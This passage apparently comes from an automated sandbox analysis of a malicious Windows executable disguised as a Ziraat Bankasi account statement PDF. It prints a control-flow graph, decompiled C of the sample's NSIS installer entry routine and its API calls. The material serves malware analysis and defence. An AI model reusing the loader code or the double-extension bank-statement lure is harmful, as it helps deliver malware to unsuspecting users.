4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                                                              Executed Functions

                                                                                              Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                                                              C-Code - Quality: 78%
                                                                                              			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\hardz\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\hardz\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                                                                              0x0040364e
                                                                                              0x0040364f
                                                                                              0x00403656
                                                                                              0x00403659
                                                                                              0x00403660
                                                                                              0x00403663
                                                                                              0x00403676
                                                                                              0x0040367c
                                                                                              0x0040367f
                                                                                              0x00403682
                                                                                              0x00403690
                                                                                              0x00403698
                                                                                              0x004036a3
                                                                                              0x004036bc
                                                                                              0x004036be
                                                                                              0x004036c6
                                                                                              0x004036c6
                                                                                              0x004036d1
                                                                                              0x004036d3
                                                                                              0x004036d3
                                                                                              0x004036e8
                                                                                              0x0040370d
                                                                                              0x0040371b
                                                                                              0x0040371e
                                                                                              0x00403725
                                                                                              0x0040372c
                                                                                              0x0040372c
                                                                                              0x00403725
                                                                                              0x0040372e
                                                                                              0x00403733
                                                                                              0x00403734
                                                                                              0x00403740
                                                                                              0x00403744
                                                                                              0x0040374b
                                                                                              0x00403759
                                                                                              0x0040375e
                                                                                              0x00403765
                                                                                              0x00403769
                                                                                              0x0040376d
                                                                                              0x0040376f
                                                                                              0x0040376f
                                                                                              0x0040376d
                                                                                              0x00403776
                                                                                              0x0040377d
                                                                                              0x00403783
                                                                                              0x0040379b
                                                                                              0x004037ab
                                                                                              0x004037b0
                                                                                              0x004037b6
                                                                                              0x004037bd
                                                                                              0x004037c4
                                                                                              0x004037c6
                                                                                              0x004037c7
                                                                                              0x004037d1
                                                                                              0x004037d8
                                                                                              0x004037da
                                                                                              0x004037dc
                                                                                              0x004037dc
                                                                                              0x004037ef
                                                                                              0x004037f1
                                                                                              0x004038eb
                                                                                              0x004038eb
                                                                                              0x004038ee
                                                                                              0x004038f1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004037fb
                                                                                              0x004037fc
                                                                                              0x004037ff
                                                                                              0x00403808
                                                                                              0x00403808
                                                                                              0x0040380b
                                                                                              0x0040380e
                                                                                              0x00403811
                                                                                              0x00403814
                                                                                              0x00403814
                                                                                              0x00403814
                                                                                              0x00403815
                                                                                              0x00403819
                                                                                              0x004038d9
                                                                                              0x004038e2
                                                                                              0x004038e4
                                                                                              0x004038e7
                                                                                              0x004038ea
                                                                                              0x004038ea
                                                                                              0x004038ea
                                                                                              0x00000000
                                                                                              0x0040381f
                                                                                              0x00403820
                                                                                              0x00403821
                                                                                              0x00403825
                                                                                              0x0040383f
                                                                                              0x00403846
                                                                                              0x00403859
                                                                                              0x0040385a
                                                                                              0x0040386f
                                                                                              0x00403874
                                                                                              0x00403876
                                                                                              0x00403878
                                                                                              0x00403894
                                                                                              0x0040389b
                                                                                              0x004038ae
                                                                                              0x004038af
                                                                                              0x004038c4
                                                                                              0x004038ca
                                                                                              0x004038cc
                                                                                              0x004038ce
                                                                                              0x004038d6
                                                                                              0x004038d8
                                                                                              0x00000000
                                                                                              0x004038d8
                                                                                              0x004038d2
                                                                                              0x004038d4
                                                                                              0x004038f9
                                                                                              0x004038fd
                                                                                              0x00403906
                                                                                              0x0040390b
                                                                                              0x00403911
                                                                                              0x0040391c
                                                                                              0x0040391e
                                                                                              0x00403923
                                                                                              0x00403925
                                                                                              0x0040397d
                                                                                              0x00403982
                                                                                              0x0040398b
                                                                                              0x00403992
                                                                                              0x00403995
                                                                                              0x00403b6c
                                                                                              0x00403b6c
                                                                                              0x00403b71
                                                                                              0x00403b7a
                                                                                              0x00403b97
                                                                                              0x00403c0f
                                                                                              0x00403c0f
                                                                                              0x00403c17
                                                                                              0x00403c19
                                                                                              0x00403c19
                                                                                              0x00403c1f
                                                                                              0x00403c1f
                                                                                              0x00403bae
                                                                                              0x00403bba
                                                                                              0x00403bcb
                                                                                              0x00403bd2
                                                                                              0x00403bd9
                                                                                              0x00403bd9
                                                                                              0x00403be1
                                                                                              0x00403bed
                                                                                              0x00403bfb
                                                                                              0x00403c06
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403bef
                                                                                              0x00403bef
                                                                                              0x00403bf0
                                                                                              0x00403bf2
                                                                                              0x00403bf3
                                                                                              0x00403bf4
                                                                                              0x00403bf9
                                                                                              0x00403c08
                                                                                              0x00403c0a
                                                                                              0x00000000
                                                                                              0x00403c0a
                                                                                              0x00000000
                                                                                              0x00403bf9
                                                                                              0x00403bed
                                                                                              0x00403b84
                                                                                              0x00403b8b
                                                                                              0x00403b8b
                                                                                              0x004039a1
                                                                                              0x00403a48
                                                                                              0x00403a48
                                                                                              0x00403a54
                                                                                              0x00000000
                                                                                              0x00403a54
                                                                                              0x004039b2
                                                                                              0x004039ba
                                                                                              0x00403a0c
                                                                                              0x00403a0c
                                                                                              0x00403a12
                                                                                              0x00403a19
                                                                                              0x00403a67
                                                                                              0x00403a69
                                                                                              0x00403a6e
                                                                                              0x00403a70
                                                                                              0x00403a78
                                                                                              0x00403a78
                                                                                              0x00403a83
                                                                                              0x00403a88
                                                                                              0x00403a8f
                                                                                              0x00403a95
                                                                                              0x00403a97
                                                                                              0x00403b6a
                                                                                              0x00403b6a
                                                                                              0x00403b6a
                                                                                              0x00000000
                                                                                              0x00403a9d
                                                                                              0x00403a9d
                                                                                              0x00403a9f
                                                                                              0x00403aa0
                                                                                              0x00403aa9
                                                                                              0x00403aa2
                                                                                              0x00403aa2
                                                                                              0x00403aa2
                                                                                              0x00403aaf
                                                                                              0x00403ab7
                                                                                              0x00403abe
                                                                                              0x00403ac6
                                                                                              0x00403ac6
                                                                                              0x00403ad3
                                                                                              0x00403adf
                                                                                              0x00403ae9
                                                                                              0x00403ae9
                                                                                              0x00403aeb
                                                                                              0x00403af2
                                                                                              0x00403afc
                                                                                              0x00403b08
                                                                                              0x00403b0e
                                                                                              0x00403b14
                                                                                              0x00403b17
                                                                                              0x00403b21
                                                                                              0x00403b27
                                                                                              0x00403b29
                                                                                              0x00403b2d
                                                                                              0x00403b3e
                                                                                              0x00403b44
                                                                                              0x00403b49
                                                                                              0x00403b4b
                                                                                              0x00403b4e
                                                                                              0x00403b54
                                                                                              0x00403b54
                                                                                              0x00403b4b
                                                                                              0x00403b29
                                                                                              0x00403b57
                                                                                              0x00403b5e
                                                                                              0x00403b5e
                                                                                              0x00403b5e
                                                                                              0x00403b5e
                                                                                              0x00403b65
                                                                                              0x00000000
                                                                                              0x00403b65
                                                                                              0x00403a97
                                                                                              0x00403a1b
                                                                                              0x00403a1e
                                                                                              0x00403a22
                                                                                              0x00403a27
                                                                                              0x00403a29
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a35
                                                                                              0x00403a40
                                                                                              0x00403a45
                                                                                              0x00000000
                                                                                              0x00403a45
                                                                                              0x004039c3
                                                                                              0x004039db
                                                                                              0x004039ec
                                                                                              0x004039ed
                                                                                              0x004039f1
                                                                                              0x004039f3
                                                                                              0x00403a01
                                                                                              0x00403a08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a08
                                                                                              0x00403a0a
                                                                                              0x00000000
                                                                                              0x00403a0a
                                                                                              0x0040392d
                                                                                              0x00403939
                                                                                              0x0040393e
                                                                                              0x00403943
                                                                                              0x00403945
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040394d
                                                                                              0x00403955
                                                                                              0x00403966
                                                                                              0x0040396e
                                                                                              0x00403970
                                                                                              0x00403975
                                                                                              0x00403977
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403977
                                                                                              0x00000000
                                                                                              0x004038d4
                                                                                              0x0040387d
                                                                                              0x0040387f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403881
                                                                                              0x00403885
                                                                                              0x00403889
                                                                                              0x00403890
                                                                                              0x00403890
                                                                                              0x00403890
                                                                                              0x00403890
                                                                                              0x00000000
                                                                                              0x00403890
                                                                                              0x0040388b
                                                                                              0x0040388e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040388e
                                                                                              0x00403827
                                                                                              0x0040382b
                                                                                              0x0040382e
                                                                                              0x00403835
                                                                                              0x00403835
                                                                                              0x00000000
                                                                                              0x00403835
                                                                                              0x00403830
                                                                                              0x00403833
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403833
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403801
                                                                                              0x00403801
                                                                                              0x00403802
                                                                                              0x00403803
                                                                                              0x00403803
                                                                                              0x00000000
                                                                                              0x00403801
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                              • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                              • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                              • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                              • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000020,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000000), ref: 004037E9
                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                                • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000000,?), ref: 00403A8F
                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,00420F08,00000001), ref: 00403B21
                                                                                              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                              • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                                                              • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                              • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                              • ExitWindowsEx.USER32 ref: 00403BFE
                                                                                              • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                              Strings
                                                                                              Memory Dump Source
